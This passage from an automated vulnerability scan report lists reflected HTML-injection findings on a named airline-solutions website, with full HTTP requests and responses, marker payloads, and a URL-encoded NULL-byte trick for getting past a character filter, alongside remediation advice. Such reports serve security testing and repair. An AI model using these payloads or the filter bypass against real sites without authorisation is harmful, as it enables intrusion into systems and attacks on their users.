This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home/includes/form_suites?suite=enterprise_operations&iframe=true&width=50022f32"><a>5557ac528ce&height=500 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/downloads/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323053; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A62%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_technology%2F%22%3Bi%3A1%3Bs%3A47%3A%22%2Fproducts_services%2Fcommercial_planning%2Fmy_list%2F%22%3Bi%3A2%3Bs%3A63%3A%22%2Fproducts_services%2Fcommercial_planning%2Fsabre_airvision_network%2F%22%3Bi%3A3%3Bs%3A62%3A%22%2Fproducts_services%2Fproduct%2Finterline_electronic_ticketing_hub%2F%22%3Bi%3A4%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Fcorporate_management%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 10:18:24 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286323053; expires=Thu, 06-Oct-2011 10:18:25 GMT; path=/
Set-Cookie: exp_last_activity=1286378305; expires=Thu, 06-Oct-2011 10:18:25 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fincludes%2Fform_suites%2F%22%3Bi%3A1%3Bs%3A62%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_technology%2F%22%3Bi%3A2%3Bs%3A47%3A%22%2Fproducts_services%2Fcommercial_planning%2Fmy_list%2F%22%3Bi%3A3%3Bs%3A63%3A%22%2Fproducts_services%2Fcommercial_planning%2Fsabre_airvision_network%2F%22%3Bi%3A4%3Bs%3A62%3A%22%2Fproducts_services%2Fproduct%2Finterline_electronic_ticketing_hub%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 10:18:26 GMT
Pragma: no-cache
Content-Length: 2152
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<input type="hidden" name="page" value="/home/includes/form_suites?suite=enterprise_operations&iframe=true&width=50022f32"><a>5557ac528ce&height=500" />
...[SNIP]...

3.99. http://www.sabreairlinesolutions.com/home/news_events [%004809212e2bef5c79 parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/news_events

Issue detail

The value of the %0048092<a>12e2bef5c79 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 633a2"><a>735ea7d59b4 was submitted in the %0048092<a>12e2bef5c79 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home/news_events?%0048092<a>12e2bef5c79=1633a2"><a>735ea7d59b4 HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.sabreairlinesolutions.com
Cookie: exp_last_visit=970953067; exp_last_activity=1286313086; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 18:18:09 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286313086; expires=Wed, 05-Oct-2011 18:18:09 GMT; path=/
Set-Cookie: exp_last_activity=1286320689; expires=Wed, 05-Oct-2011 18:18:09 GMT; path=/
Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 05 Oct 2010 18:18:10 GMT
Pragma: no-cache
Content-Length: 7833
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a>12e2bef5c79=1633a2"><a>735ea7d59b4">
...[SNIP]...

3.100. http://www.sabreairlinesolutions.com/home/news_events [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/news_events

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0016d00"><a>26e1511d709 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 16d00"><a>26e1511d709 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/news_events?%0016d00"><a>26e1511d709=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: exp_last_visit=970952799; exp_last_activity=1286312799; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 17:19:39 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1286317180; expires=Wed, 05-Oct-2011 17:19:40 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A13%3A%22%2Fnews_events%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 05 Oct 2010 17:19:58 GMT
Pragma: no-cache
Content-Length: 7795
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/home/news_events?%0016d00"><a>26e1511d709=1">
...[SNIP]...

3.101. http://www.sabreairlinesolutions.com/home/news_events/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/news_events/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00a5f95"><a>5ba92138525 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a5f95"><a>5ba92138525 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/news_events/?%00a5f95"><a>5ba92138525=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321219; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A27%3A%22%2Fproducts_services%2Fproduct%2F%22%3Bi%3A1%3Bs%3A49%3A%22%2Fnews_events%2Fevent%2Fsabresonic_global_conference2%2F%22%3Bi%3A2%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:37:16 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321219; expires=Thu, 06-Oct-2011 09:37:19 GMT; path=/
Set-Cookie: exp_last_activity=1286375839; expires=Thu, 06-Oct-2011 09:37:19 GMT; path=/
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A13%3A%22%2Fnews_events%2F%22%3Bi%3A1%3Bs%3A27%3A%22%2Fproducts_services%2Fproduct%2F%22%3Bi%3A2%3Bs%3A49%3A%22%2Fnews_events%2Fevent%2Fsabresonic_global_conference2%2F%22%3Bi%3A3%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:37:23 GMT
Pragma: no-cache
Content-Length: 7834
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/home/news_events/?%00a5f95"><a>5ba92138525=1">
...[SNIP]...

3.102. http://www.sabreairlinesolutions.com/home/news_events/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/news_events/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %00c3bac<a>1d963d7e0b4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c3bac<a>1d963d7e0b4 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/news_events/?%00c3bac<a>1d963d7e0b4=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321219; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A27%3A%22%2Fproducts_services%2Fproduct%2F%22%3Bi%3A1%3Bs%3A49%3A%22%2Fnews_events%2Fevent%2Fsabresonic_global_conference2%2F%22%3Bi%3A2%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:41:48 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321219; expires=Thu, 06-Oct-2011 09:42:00 GMT; path=/
Set-Cookie: exp_last_activity=1286376120; expires=Thu, 06-Oct-2011 09:42:00 GMT; path=/
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A13%3A%22%2Fnews_events%2F%22%3Bi%3A1%3Bs%3A27%3A%22%2Fproducts_services%2Fproduct%2F%22%3Bi%3A2%3Bs%3A49%3A%22%2Fnews_events%2Fevent%2Fsabresonic_global_conference2%2F%22%3Bi%3A3%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:42:26 GMT
Pragma: no-cache
Content-Length: 7830
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a>1d963d7e0b4=1">?%00c3bac<a>1d963d7e0b4=1</a>
...[SNIP]...

3.103. http://www.sabreairlinesolutions.com/home/news_events/event/2009_sabresonic_loyalty_user_conference [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/news_events/event/2009_sabresonic_loyalty_user_conference

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %001da3b<a>f5b12036d1a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1da3b<a>f5b12036d1a in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/news_events/event/2009_sabresonic_loyalty_user_conference?%001da3b<a>f5b12036d1a=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/news_events/events/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322311; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A59%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_loyalty%2F%22%3Bi%3A1%3Bs%3A38%3A%22%2Fbusiness_issues%2Fother_airline_issues%2F%22%3Bi%3A2%3Bs%3A33%3A%22%2Fproducts_services%2Fproduct_index%2F%22%3Bi%3A3%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_movement_manager%2F%22%3Bi%3A4%3Bs%3A57%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_acars_manager%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:27:02 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322311; expires=Thu, 06-Oct-2011 09:27:03 GMT; path=/
Set-Cookie: exp_last_activity=1286375223; expires=Thu, 06-Oct-2011 09:27:03 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A59%3A%22%2Fnews_events%2Fevent%2F2009_sabresonic_loyalty_user_conference%2F%22%3Bi%3A1%3Bs%3A59%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_loyalty%2F%22%3Bi%3A2%3Bs%3A38%3A%22%2Fbusiness_issues%2Fother_airline_issues%2F%22%3Bi%3A3%3Bs%3A33%3A%22%2Fproducts_services%2Fproduct_index%2F%22%3Bi%3A4%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_movement_manager%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:27:06 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 11959

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a>f5b12036d1a=1">2009 sabresonic loyalty user conference?%001da3b<a>f5b12036d1a=1</a>
...[SNIP]...

3.104. http://www.sabreairlinesolutions.com/home/news_events/event/2009_sabresonic_loyalty_user_conference [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/news_events/event/2009_sabresonic_loyalty_user_conference

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0071aa9"><a>a46e784cedb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 71aa9"><a>a46e784cedb in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/news_events/event/2009_sabresonic_loyalty_user_conference?%0071aa9"><a>a46e784cedb=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/news_events/events/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322311; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A59%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_loyalty%2F%22%3Bi%3A1%3Bs%3A38%3A%22%2Fbusiness_issues%2Fother_airline_issues%2F%22%3Bi%3A2%3Bs%3A33%3A%22%2Fproducts_services%2Fproduct_index%2F%22%3Bi%3A3%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_movement_manager%2F%22%3Bi%3A4%3Bs%3A57%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_acars_manager%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:21:59 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322311; expires=Thu, 06-Oct-2011 09:21:59 GMT; path=/
Set-Cookie: exp_last_activity=1286374919; expires=Thu, 06-Oct-2011 09:21:59 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A59%3A%22%2Fnews_events%2Fevent%2F2009_sabresonic_loyalty_user_conference%2F%22%3Bi%3A1%3Bs%3A59%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_loyalty%2F%22%3Bi%3A2%3Bs%3A38%3A%22%2Fbusiness_issues%2Fother_airline_issues%2F%22%3Bi%3A3%3Bs%3A33%3A%22%2Fproducts_services%2Fproduct_index%2F%22%3Bi%3A4%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_movement_manager%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:22:24 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 11963

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a href="/home/news_events/event/2009_sabresonic_loyalty_user_conference?%0071aa9"><a>a46e784cedb=1">
...[SNIP]...

3.105. http://www.sabreairlinesolutions.com/home/news_events/event/operations_user_conference [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/news_events/event/operations_user_conference

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %001f710<a>ed5b0b7211d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1f710<a>ed5b0b7211d in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/news_events/event/operations_user_conference?%001f710<a>ed5b0b7211d=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/news_events/events/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322307; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A55%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_res%2F%22%3Bi%3A1%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3Bi%3A2%3Bs%3A55%3A%22%2Fproducts_services%2Fservices%2Fdelivery_and_customer_care%2F%22%3Bi%3A3%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_recovery_manager%2F%22%3Bi%3A4%3Bs%3A59%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_flight_explorer%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:27:47 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322307; expires=Thu, 06-Oct-2011 09:27:48 GMT; path=/
Set-Cookie: exp_last_activity=1286375268; expires=Thu, 06-Oct-2011 09:27:48 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A46%3A%22%2Fnews_events%2Fevent%2Foperations_user_conference%2F%22%3Bi%3A1%3Bs%3A55%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_res%2F%22%3Bi%3A2%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3Bi%3A3%3Bs%3A55%3A%22%2Fproducts_services%2Fservices%2Fdelivery_and_customer_care%2F%22%3Bi%3A4%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_recovery_manager%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:28:15 GMT
Pragma: no-cache
Content-Length: 6089
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a>ed5b0b7211d=1">operations user conference?%001f710<a>ed5b0b7211d=1</a>
...[SNIP]...

3.106. http://www.sabreairlinesolutions.com/home/news_events/event/operations_user_conference [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/news_events/event/operations_user_conference

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00ae971"><a>710f86d987f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ae971"><a>710f86d987f in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/news_events/event/operations_user_conference?%00ae971"><a>710f86d987f=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/news_events/events/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322307; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A55%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_res%2F%22%3Bi%3A1%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3Bi%3A2%3Bs%3A55%3A%22%2Fproducts_services%2Fservices%2Fdelivery_and_customer_care%2F%22%3Bi%3A3%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_recovery_manager%2F%22%3Bi%3A4%3Bs%3A59%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_flight_explorer%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:23:18 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322307; expires=Thu, 06-Oct-2011 09:23:19 GMT; path=/
Set-Cookie: exp_last_activity=1286374999; expires=Thu, 06-Oct-2011 09:23:19 GMT; path=/
